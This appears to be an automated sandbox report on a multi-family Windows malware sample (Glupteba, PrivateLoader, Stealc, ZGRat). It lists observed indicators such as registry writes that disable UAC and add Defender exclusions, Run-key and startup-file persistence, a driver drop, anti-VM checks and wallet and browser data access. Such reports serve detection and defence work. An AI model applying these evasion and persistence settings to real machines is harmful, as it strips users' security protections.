Malware Analysis Report

2024-11-15 08:44

Sample ID 240510-enhk2ahh9v
Target d6078bbecc15a333c6171debc4488498.exe
SHA256 8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913
Tags
glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913

Threat Level: Known bad

The file d6078bbecc15a333c6171debc4488498.exe was found to be: Known bad.

Malicious Activity Summary

glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan upx

Glupteba payload

Stealc

Modifies firewall policy service

Windows security bypass

ZGRat

UAC bypass

Detect ZGRat V1

PrivateLoader

Glupteba

Modifies boot configuration data using bcdedit

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Downloads MZ/PE file

Reads user/profile data of web browsers

Checks computer location settings

Reads data files stored by FTP clients

Windows security modification

Themida packer

Checks BIOS information in registry

UPX packed file

Drops startup file

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Checks whether UAC is enabled

Manipulates WinMonFS driver.

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

System policy modification

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 04:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 04:05

Reported

2024-05-10 04:07

Platform

win7-20240215-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

PrivateLoader

loader privateloader

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sumv9e2zZTPfbr2KJrMWLNxW.exe = "0" C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\00fKWSRoAerNWHLuZOUwTWLf.exe = "0" C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uTsEd5zaWAwTh2I5zhyQgn96.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\dSRtB270COtELwP0avgpGVnT.exe = "0" C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ARjQUSHzQYtRWezpQRCfQhpA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYMwLXrmZMiex6EUCXyUvaLi.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GkcKN5W0Qsc1Iu0iNolJG9YA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ET1F8QmK4lwnrcepgBxgn0a9.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\31qGBJcGUvOUxPWSwiaphdYR.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XqQTJm8eo9LYXK4iYRu71AFH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B3hGdaAIo7EP8qbDaWdC7YgL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sumv9e2zZTPfbr2KJrMWLNxW.exe = "0" C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\dSRtB270COtELwP0avgpGVnT.exe = "0" C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uTsEd5zaWAwTh2I5zhyQgn96.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\00fKWSRoAerNWHLuZOUwTWLf.exe = "0" C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2220 set thread context of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240510040523.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u26o.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u26o.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u26o.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Windows\windefender.exe N/A
